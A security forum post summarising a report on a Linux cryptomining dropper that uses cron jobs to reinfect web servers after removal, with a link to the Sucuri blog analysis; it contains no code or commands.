silversurfer
Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
- Aug 17, 2014
- 10,055
A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed.
The malware was initially discovered on a web server with a maxed out CPU by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources.
As Sucuri's security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method — most probably after exploiting an unpatched vulnerability, brute forcing their way in, or by phishing the admin credentials.
Cryptomining Dropper and Cronjob Creator
Our website security analyst explains how a bash script performs a number of actions to configure crontab settings for malicious web server cryptominers.
blog.sucuri.net